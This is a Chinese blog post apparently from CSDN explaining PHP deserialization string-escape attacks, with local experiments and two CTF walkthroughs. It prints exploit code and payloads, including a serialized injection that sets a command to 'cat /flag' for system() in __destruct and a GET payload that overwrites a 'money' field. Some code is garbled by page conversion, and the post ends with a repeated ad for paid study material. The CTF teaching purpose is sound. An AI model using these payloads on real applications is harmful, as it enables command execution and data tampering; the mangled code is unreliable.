php反序列化学习之字符串逃逸

最新推荐文章于 2024-06-28 14:38:04 发布

2401_83947434

最新推荐文章于 2024-06-28 14:38:04 发布

阅读量443

点赞数 18

分类专栏： 2024年程序员学习文章标签： php 学习 android

本文链接：https://blog.csdn.net/2401_83947434/article/details/137659021

版权

2024年程序员学习专栏收录该内容

274 篇文章 0 订阅

订阅专栏

//利用一个变量修改目标变量

{
return str_replace(‘b’,‘cc’,$str);
}
class A{
public $name=‘ben’;
public $info=“ctfer”;
}
$test1=new A(); print\_r($ test1).“\n”;
echo “\n”.serialize($test1).“\n”;
$tar=‘";s:4:“info”;s:6:“hacker”;}’; //27
$payload=get\_payload('b',strlen($ tar),$tar); //利用getpayload生成利用的payload
$t es t 1 - > nam e =$ payload;
print_r( $KaTeX parse error: Undefined control sequence: \n at position 9: test1)."\̲n̲"; print\_r(ser…$ test1)).“\n”;
$res=filter\_repmore(serialize($ test1));
echo “\n”.$res.“\n”;
$c = u n ser ia l i ze ($ res);
print_r($c);
?>


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/15d5a393504f40aa9e42e41a262a5d9f.png#pic_center)  
 可以看到，info的值被修改了


接下来以一道简单的题目来讲构造流程


#### 题目实战


newstarctf 2024 week4 逃


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ef79a750748c4633a44e258c2262c1fc.png#pic_center)


可以看到，这里有个waf过滤函数，把对象序列化并过滤后再反序列化，是过滤后变长的题型


总体思路—>利用我们能控制的key去修改cmd，在\_\_destruct中system执行cmd


具体实现:


1拿下来源码放在本地，稍作修改:

<?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd key= class GetFlag { public $key='123'; public $cmd = "ls"; #cmd是我们要去修改的，先写死 public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } echo serialize(new GetFlag()); # ``` 这段代码就是查看正常的序列化后的字符串（其中含有我们想要的cmd值），当然如果对序列化熟悉的话可以直接构造payload ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b3324cfb9ffb46769702a74855a5093e.png#pic_center) 把红框部分拿下来即可 2.配合前面写的get\_payload函数构造payload，并在本地尝试是否成功 bad被替换为good，一个bad可以逃逸一个字符，所以需要直接传入序列化字符串长度即可 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/5efbed53f25c48bc9623bca18373bc43.png#pic_center) 可以看到，在本地实验成功，接下来只要修改cmd的值为其他系统命令，**再修改序列化字符串中cmd的长度**，然后把$payload传过去即可最后的exp: ``` <?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd class GetFlag { public $key='ls'; public $cmd = "whoami"; public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } $key='";s:3:"cmd";s:9:"cat /flag";}'; $payload=get\_payload('bad',strlen($key),$key); echo "\n".$payload; ?>


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3d151f693b734d32a4ae325cd3baa859.png#pic_center)  
 把payload赋值为key即可，


结果:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7354fa75b6cf4340a6cf40bc5100b8d6.png#pic_center)


### 过滤后变短


#### 实验学习

<?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } ``` 像上面的过滤函数，把b替换为空，替换后序列化的字符串长度减少，就是过滤后变短的情况，这一种就是与变长不同，要利用两个变量（info和name）去修改两个变量（info和password）第一步，也是要先拿到我们含有修改目标的序列化字符串,name值随意 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a6e5eb41c6e3415c88b487dd3ebf41ef.png#pic_center) 我们的目的也是一样的，要通过";构造闭合，然后让php来反序列化我们设计好的序列化字符串，从而修改变量，尝试把info的值赋值为上面红框里的序列化字符串，那为什么不跟变长的类型一样，直接把序列化字符串跟在name的值后面呢？看下图: ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/839005acc18f4a89bda1c0693e37db90.png#pic_center) 如果跟在name后面，由于name的长度本身就很长，过滤后name的值变短了，我们的序列化字符串就会被读取为name的值(逃不出去)，就无法发挥它的作用了，所以要把info的值设为序列化字符串 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7cfcac1b340e471fb81ef5f8a01d4fbd.png#pic_center) 如果要让绿框内的字符串正常反序列化，而不是被当作字符串读取，红框内的全部内容就填充进name的值中，";s:4:“info”;s:60:"长度为19，**如果name的值设为19个b，经过过滤函数过滤为空后，那么php就会往下读取，把本不该读取的 “;s:4:“info”;s:60:” 读取为name的值，后面的序列化字符串就会逃逸出去，不被当作字符串来读取，而是被成功反序列化，修改info** 完整实验代码: ``` <?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } $test1=new C(); echo serialize($test1)."\n"; $tar='";s:4:"info";s:6:"hacker";s:8:"password";s:10:"helloworld";}'; $test1->name=get\_payload('b',19); $test1->info=$tar; print\_r(($test1)); $res=serialize($test1); $r=filter\_repless($res); echo $res; echo "\n".$r."\n"; $c=unserialize($r); print\_r($c); ?>


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/902eb66514234c47be1e128de80aee89.png#pic_center)


反序列化成功，password被修改，name具体要多少个被替换的字符，要根据题目实际来计算


#### 题目实战


上网找了一个也是比较简单的题目的源码

<?php show\_source("index123.php"); //error\_reporting(0); function filter($str) { return preg\_replace('/abc|zcxx/','',$str); } class Login{ public $name; public $pwd; public $money; public function \_\_construct() { $this->name=$\_GET['name']; $this->pwd=$\_GET['pwd']; $this->money='999'; } } if($\_GET['name']&&$\_GET['pwd']) { $login = new Login(); $last = unserialize(filter(serialize($login))); if ($last->money < 1000) { echo('get more money'); } else { echo file\_get\_contents('flag.php'); } } else { die("name and password can't be null"); } ?>


由源码可知，需要修改money参数>1000,才能拿到flag，name和pwd是我们可以控制的，利用name和pwd修改money，由过滤函数可知过滤后变短的题型，


1.本地拿下源码，先构造出包含（money=1001，pwd的属性和值） 的正常的序列化后的字符串，目的就是赋值给pwd，在反序列化时能够按照我们设定的来反序列化，从而修改money**别忘记开头要包含 "; 来手动闭合**


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/186c9a4d974348db9d1cb8b965d3c2da.png#pic_center)


2.然后先把name赋值给abc，查看过滤后的序列化字符串，计算要逃逸的字符数量


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/46f3c956550548a79375aee7d72357cc.png#pic_center)


如上图，我们的目的是，在反序列化时 “;s:3:“pwd”;s:46:” 时作为name的字符串内容来读取，后面的红框内容就可以逃出去，按照反序列化流程来修改money， “;s:3:“pwd”;s:46:” 长度为18，一个abc能提供3个字符逃逸，所以我们把name赋值为6个abc即可


最终exp:

<?php include "func.php"; function filter($str) { return preg\_replace('/abc|zcxx/','',$str); } class Login{ public $name; public $pwd; public $money; public function \_\_construct() { $this->name='abc'; $this->pwd='123'; $this->money='1001'; } } $test=new Login(); $test->pwd='";s:3:"pwd";s:3:"123";s:5:"money";s:4:"1001";}'; $tar='";s:3:"pwd";s:46:"'; //26 echo strlen($tar); $test->name=get\_payload('abc',6); echo filter(serialize($test)); print\_r(unserialize(filter(serialize($test)))); echo"\n".$test->name; echo"\n".$test->pwd; ?>


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/bb85c713bcd94baebf82242672929325.png#pic_center)


在本地的环境实验后得知，money的值成功被修改，然后构造payload即可

/?name=abcabcabcabcabcabc&pwd=";s:3:“pwd”;s:3:“123”;s:5:“money”;s:4:“1001”;}


结果:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/943cd2679df14def8ba02148b4e1e465.png#pic_center)



**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/0b4ba3c9bb51ec556dc34cc15bf6413f.png)
![img](https://img-blog.csdnimg.cn/img_convert/c4761b1c4f9cb83214c14d7759b206f1.png)
![img](https://img-blog.csdnimg.cn/img_convert/72adafda18f9acc751f1219a65fc382a.png)
![img](https://img-blog.csdnimg.cn/img_convert/66d48af161514f047f9065a4d75cd75f.png)
![img](https://img-blog.csdnimg.cn/img_convert/5a7f4456543049d15bd14ace2a314abd.png)
![img](https://img-blog.csdnimg.cn/img_convert/a3b59edce69a3dc279f4a101cd1f2a99.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

**如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）**
![img](https://img-blog.csdnimg.cn/img_convert/3286f01890dbf85e726c494900b7d7ad.png)

1015)]
[外链图片转存中...(img-UfXWuNUC-1712855331015)]
[外链图片转存中...(img-mbxyWvxl-1712855331016)]
[外链图片转存中...(img-lklZmZAy-1712855331016)]

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

**如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）**
[外链图片转存中...(img-4LruoqZm-1712855331016)]

2401_83947434

关注

18
点赞
踩
20

收藏

觉得还不错? 一键收藏
0
评论
php反序列化学习之字符串逃逸

s:60:” 读取为name的值，后面的序列化字符串就会逃逸出去，不被当作字符串来读取，而是被成功反序列化，修改info**构造闭合，然后让php来反序列化我们设计好的序列化字符串，从而修改变量，尝试把info的值赋值为上面红框里的序列化字符串，那为什么不跟变长的类型一样，直接把序列化字符串跟在name的值后面呢？如果跟在name后面，由于name的长度本身就很长，过滤后name的值变短了，我们的序列化字符串就会被读取为name的值(逃不出去)，就无法发挥它的作用了，所以要把info的值设为序列化字符串。
复制链接

扫一扫